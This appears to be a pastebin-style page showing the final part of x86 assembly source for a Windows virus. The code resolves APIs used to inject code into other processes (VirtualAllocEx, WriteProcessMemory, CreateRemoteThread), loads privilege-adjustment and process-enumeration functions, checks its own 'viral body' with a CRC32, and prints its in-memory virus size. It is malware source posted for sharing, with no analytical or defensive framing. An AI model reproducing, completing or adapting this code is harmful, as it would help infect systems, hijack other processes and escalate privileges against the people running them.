  917.     dd  offset _GetCurrentProcess-Start
  918.     dd  offset _OpenProcess-Start
  919.     dd  offset _VirtualAllocEx-Start
  920.     dd  offset _WriteProcessMemory-Start
  921.     dd  offset _CreateRemoteThread-Start
  922.     dd  offset _VirtualFreeEx-Start
  923.     dd  offset _CloseHandle-Start
  924.     dd  offset _VirtualProtectEx-Start
  925.     dd  offset _GetFileType-Start
  926.     dd  offset _CreateFileMappingA-Start
  927.     dd  offset _MapViewOfFile-Start
  928.     dd  offset _UnmapViewOfFile-Start
  929.     dd  offset _CreateFileW-Start
  930.  
  931. CRC32:  push    ecx         ;procedure for calculating CRC32s
  932.     push    edx         ;at run-time
  933.     push    ebx      
  934.         xor ecx,ecx  
  935.         dec ecx        
  936.         mov edx,ecx  
  937. NextByteCRC:          
  938.         xor eax,eax  
  939.         xor ebx,ebx  
  940.         lodsb          
  941.         xor al,cl    
  942.     mov cl,ch
  943.     mov ch,dl
  944.     mov dl,dh
  945.     mov dh,8
  946. NextBitCRC:
  947.     shr bx,1
  948.     rcr ax,1
  949.     jnc NoCRC
  950.     xor ax,08320h
  951.     xor bx,0EDB8h
  952. NoCRC:  dec dh
  953.     jnz NextBitCRC
  954.     xor ecx,eax
  955.     xor edx,ebx
  956.         dec edi
  957.     jne NextByteCRC
  958.     not edx
  959.     not ecx
  960.     pop ebx
  961.     mov eax,edx
  962.     rol eax,16
  963.     mov ax,cx
  964.     pop edx
  965.     pop ecx
  966.     ret
  967.  
  968. ;get addressez of ADVAPI32 APIz
  969.  
  970. advapi_apiz Proc
  971.     @pushsz 'ADVAPI32'
  972.     mov eax,12345678h
  973. _LoadLibraryA = dword ptr $-4
  974.     call    eax         ;load ADVAPI32
  975.     xchg    eax,ebx
  976.     mov [ebp + _advapi32 - gdelta],ebx
  977.  
  978.     @pushsz 'OpenProcessToken'
  979.     push    ebx
  980.     mov esi,12345678h
  981. _GetProcAddress = dword ptr $-4
  982.     call    esi
  983.     mov [ebp + _OpenProcessToken - gdelta],eax
  984.                     ;save API address
  985.     @pushsz 'LookupPrivilegeValueA'
  986.     push    ebx
  987.     call    esi
  988.     mov [ebp + _LookupPrivilegeValueA - gdelta],eax
  989.                     ;--- " " ---
  990.     @pushsz 'AdjustTokenPrivileges'
  991.     push    ebx
  992.     call    esi
  993.     mov [ebp + _AdjustTokenPrivileges - gdelta],eax
  994.                     ;--- " " ---
  995.     ret
  996. advapi_apiz EndP
  997.  
  998. ;get addressez of PSAPI APIz
  999.  
  1000. psapi_apiz  Proc
  1001.     @pushsz 'PSAPI'
  1002.     call    [ebp + _LoadLibraryA - gdelta]  ;load PSAPI
  1003.     xchg    eax,ebx
  1004.     mov [ebp + _psapi - gdelta],ebx
  1005.     @pushsz 'EnumProcesses'
  1006.     push    ebx
  1007.     call    esi
  1008.     mov [ebp + _EnumProcesses - gdelta],eax
  1009.                     ;save API address
  1010.     @pushsz 'EnumProcessModules'
  1011.     push    ebx
  1012.     call    esi
  1013.     mov [ebp + _EnumProcessModules - gdelta],eax
  1014.                     ;--- " " ---
  1015.  
  1016.     @pushsz 'GetModuleBaseNameA'
  1017.     push    ebx
  1018.     call    esi
  1019.     mov [ebp + _GetModuleBaseNameA - gdelta],eax
  1020.                     ;--- " " ---
  1021.  
  1022.     @pushsz 'EnumProcesses'
  1023.     push    ebx
  1024.     call    esi
  1025.     mov [ebp + _EnumProcesses - gdelta],eax
  1026.                     ;--- " " ---
  1027.     ret
  1028. psapi_apiz  EndP
  1029.  
  1030. token_priv  dd  1
  1031. p_luid      dq  ?
  1032.         dd  2
  1033. procz       dd  80h dup (?)
  1034.         dd  ?
  1035. modz        dd  ?
  1036. mod_name    db  MAX_PATH dup (?)
  1037. p_token     dd  ?
  1038. tmp     dd  ?
  1039.  
  1040. check_crc32:
  1041.     pop esi
  1042.     mov edi,check_crc32-protected
  1043.     call    CRC32               ;calculate CRC32 for viral body
  1044.     cmp eax,0D620301Eh
  1045.     jne end_seh             ;quit if does not match
  1046.     jmp protected
  1047. virtual_end:
  1048.  
  1049. .code                       ;first generation code
  1050. FirstGeneration:
  1051.  
  1052.     jmp Start
  1053.  
  1054.     ;virtual size of virus
  1055.     db  0dh,0ah,'Virus size in memory: '
  1056.     db  '0'+((virtual_end-rtStart)/1000) mod 10
  1057.     db  '0'+((virtual_end-rtStart)/100) mod 10
  1058.     db  '0'+((virtual_end-rtStart)/10) mod 10
  1059.     db  '0'+((virtual_end-rtStart)/1) mod 10
  1060.     db  0dh,0ah
  1061. ends
  1062. End FirstGeneration
Add Comment
Please, Sign In to add comment